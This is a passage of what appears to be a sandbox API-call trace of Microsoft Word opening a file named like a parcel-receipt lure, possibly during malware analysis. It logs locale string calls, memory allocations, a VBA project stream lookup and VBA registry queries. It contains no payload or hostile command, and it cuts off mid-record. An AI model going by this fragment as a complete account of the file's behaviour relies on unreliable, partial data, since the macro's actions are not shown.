dwMapFlags=0x600000, lpSrcStr="コ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゴ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="サ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ザ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="シ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ジ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ス", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ズ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="セ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゼ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ソ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゾ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="タ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ダ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="チ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヂ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ッ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ツ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヅ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="テ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="デ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ト", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ド", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ナ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ニ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヌ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ネ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ノ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ハ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="バ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="パ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヒ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ビ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ピ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="フ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ブ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="プ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヘ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ベ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ペ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ホ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ボ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ポ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="マ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ミ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ム", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="メ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="モ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ャ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヤ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ュ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ユ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ョ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヨ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ラ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="リ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ル", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="レ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ロ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヮ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ワ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヰ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヱ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヲ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ン", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヴ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヵ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヶ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヷ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヸ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヹ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヺ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="・", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ー", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヽ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヾ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.891] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヿ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.893] GetUserDefaultLangID () returned 0x409 [0016.893] GetSystemDefaultLangID () returned 0x410409 [0016.893] GetSystemMetrics (nIndex=42) returned 0 [0016.893] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x3c) returned 0x77d7240 [0016.893] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x38) returned 0x5674410 [0016.893] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20000*=0x78746341) returned 0x7a35970 [0016.894] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x78348f0 [0016.894] GetStockObject (i=13) returned 0x18a002e [0016.894] GetObjectA (in: h=0x18a002e, c=60, pv=0x2876c0 | out: pv=0x2876c0) returned 60 [0016.894] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x7d8) returned 0x7956000 [0016.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x795600c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0016.894] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x98) returned 0x77c92f0 [0016.894] VirtualQuery (in: lpAddress=0x287840, lpBuffer=0x287800, dwLength=0x30 | out: lpBuffer=0x287800*(BaseAddress=0x287000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x9000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0016.895] CreateCompatibleDC (hdc=0x0) returned 0xc0108db [0016.895] GetCurrentObject (hdc=0xc0108db, type=0x7) returned 0x185000f [0016.895] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x7834740 [0016.895] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x28) returned 0x7834710 [0016.922] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", lpString2="") returned 1 [0016.922] lstrlenA (lpString="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 54 [0016.923] lstrcpyA (in: lpString1=0xa3ac750, lpString2="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" [0016.923] SetCursor (hCursor=0x10007) returned 0x10007 [0016.923] GetCurrentThreadId () returned 0x958 [0016.923] GetCurrentThreadId () returned 0x958 [0016.923] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x4) returned 0x790dbd0 [0016.923] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xf0) returned 0x79ccf50 [0016.923] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x4006e0 [0016.923] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x280) returned 0x77ebb20 [0016.924] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xa08) returned 0x79574e0 [0016.924] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x1738) returned 0x7a67b30 [0016.925] GetLocalTime (in: lpSystemTime=0x287678 | out: lpSystemTime=0x287678*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x174)) [0016.925] _ultow_s (in: _Value=0x5c2b45a3, _Buffer=0x77ebb4a, _BufferCount=0x103, _Radix=16 | out: _Buffer="5c2b45a3") returned 0x0 [0016.925] wcsncpy_s (in: _Destination=0x287340, _SizeInWords=0x108, _Source="*\\Z005c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z005c2b45a3") returned 0x0 [0016.925] CharLowerBuffW (in: lpsz="*\\Z005c2b45a3", cchLength=0xd | out: lpsz="*\\z005c2b45a3") returned 0xd [0016.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005c2b45a3", cchWideChar=14, lpMultiByteStr=0x287270, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0016.925] wcscpy_s (in: _Destination=0x400700, _SizeInWords=0xe, _Source="*\\Z005c2b45a3" | out: _Destination="*\\Z005c2b45a3") returned 0x0 [0016.925] wcsncpy_s (in: _Destination=0x287380, _SizeInWords=0x108, _Source="*\\Z005c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z005c2b45a3") returned 0x0 [0016.925] CharLowerBuffW (in: lpsz="*\\Z005c2b45a3", cchLength=0xd | out: lpsz="*\\z005c2b45a3") returned 0xd [0016.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005c2b45a3", cchWideChar=14, lpMultiByteStr=0x2872b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0016.925] lstrcpyA (in: lpString1=0xa3ac790, lpString2="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" [0016.925] lstrcpyA (in: lpString1=0xa3ac790, lpString2="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" [0016.925] lstrcpyA (in: lpString1=0xa3ac790, lpString2="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" [0016.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa3ac790, cbMultiByte=-1, lpWideCharStr=0x287ce0, cchWideChar=55 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 55 [0016.925] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0016.925] wcscpy_s (in: _Destination=0x287a86, _SizeInWords=0x105, _Source="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" | out: _Destination="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0016.925] wcsncpy_s (in: _Destination=0x2876a0, _SizeInWords=0x108, _Source="*\\Z005c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z005c2b45a3") returned 0x0 [0016.925] CharLowerBuffW (in: lpsz="*\\Z005c2b45a3", cchLength=0xd | out: lpsz="*\\z005c2b45a3") returned 0xd [0016.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005c2b45a3", cchWideChar=14, lpMultiByteStr=0x2875d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0016.926] _wcsicmp (_String1="*\\Z005c2b45a3", _String2="*\\Z005c2b45a3") returned 0 [0016.926] wcsncpy_s (in: _Destination=0x2876a0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0016.926] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", cchLength=0x39 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc") returned 0x39 [0016.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", cchWideChar=58, lpMultiByteStr=0x2875d0, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", lpUsedDefaultChar=0x0) returned 58 [0016.926] wcscpy_s (in: _Destination=0x78ede70, _SizeInWords=0x3a, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0016.926] wcsncpy_s (in: _Destination=0x2876a0, _SizeInWords=0x108, _Source="*\\Z005c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z005c2b45a3") returned 0x0 [0016.926] CharLowerBuffW (in: lpsz="*\\Z005c2b45a3", cchLength=0xd | out: lpsz="*\\z005c2b45a3") returned 0xd [0016.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005c2b45a3", cchWideChar=14, lpMultiByteStr=0x2875d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0016.926] _wcsicmp (_String1="*\\Z005c2b45a3", _String2="*\\Z005c2b45a3") returned 0 [0016.926] wcsncpy_s (in: _Destination=0x2876e0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0016.926] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", cchLength=0x39 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc") returned 0x39 [0016.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", cchWideChar=58, lpMultiByteStr=0x287610, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", lpUsedDefaultChar=0x0) returned 58 [0016.926] wcscpy_s (in: _Destination=0x77ebb40, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0016.926] CExposedDocFile::AddRef () returned 0x2 [0016.926] CExposedDocFile::OpenStorage () returned 0x0 [0016.926] CExposedDocFile::AddRef () returned 0x2 [0016.926] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x84) returned 0x4006e0 [0016.926] wcscpy_s (in: _Destination=0x400750, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0016.926] wcscpy_s (in: _Destination=0x286f80, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0016.926] _ltow_s (in: _Value=0, _Buffer=0x286f8c, _BufferCount=0x3a, _Radix=16 | out: _Buffer="0") returned 0x0 [0016.926] CExposedDocFile::OpenStream () returned 0x80030002 [0016.926] IMalloc:Free (This=0x7fefe9e5380, pv=0x4006e0) [0016.926] longjmp () [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x84) returned 0x4006e0 [0016.929] wcscpy_s (in: _Destination=0x400750, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f41d0 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f4290 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0x79e0260 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0x79e04b0 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0x79e0700 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x28) returned 0x7832340 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10) returned 0x7976de0 [0016.929] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x286f7c, cchData=6 | out: lpLCData="1252") returned 5 [0016.929] atoi (_Str="1252") returned 1252 [0016.929] GetLocalTime (in: lpSystemTime=0x286f70 | out: lpSystemTime=0x286f70*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x174)) [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7932eb0 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790db80 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7932f40 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x78322e0 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7932fd0 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790db60 [0016.929] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790db50 [0016.929] strcpy_s (in: _Dst=0x286d50, _DstSize=0xc8, _Src="Software\\Microsoft\\VBA\\" | out: _Dst="Software\\Microsoft\\VBA\\") returned 0x0 [0016.929] strcat_s (in: _Destination="Software\\Microsoft\\VBA\\", _SizeInBytes=0xc8, _Source="7.1\\Common" | out: _Destination="Software\\Microsoft\\VBA\\7.1\\Common") returned 0x0 [0016.929] RegCreateKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x7fef106d500, lpdwDisposition=0x0 | out: phkResult=0x7fef106d500*=0x998, lpdwDisposition=0x0) returned 0x0 [0016.929] RegQueryValueExA (in: hKey=0x998, lpValueName="RequireDeclaration", lpReserved=0x0, lpType=0x286e28, lpData=0x286e20, lpcbData=0x286e24*=0x4 | out: lpType=0x286e28*=0x0, lpData=0x286e20*=0x8b, lpcbData=0x286e24*=0x4) returned 0x2 [0016.929] RegQueryValueExA (in: hKey=0x998, lpValueName="CompileOnDemand", lpReserved=0x0, lpType=0x286e28, lpData=0x286e20, lpcbData=0x286e24*=0x4 | out: lpType=0x286e28*=0x0, lpData=0x286e20*=0x0, lpcbData=0x286e24*=0x4) returned 0x2 [0016.929] RegQueryValueExA (in: hKey=0x998, lpValueName="NotifyUserBeforeStateLoss", lpReserved=0x0, lpType=0x286e28, lpData=0x286e20, lpcbData=0x286e24*=0x4 | out: lpType=0x286e28*=0x0, lpData=0x286e20*=0x1, lpcbData=0x286e24*=0x4) returned 0x2 [0016.929] RegQueryValueExA (in: hKey=0x998, lpValueName="BackGroundCompile", 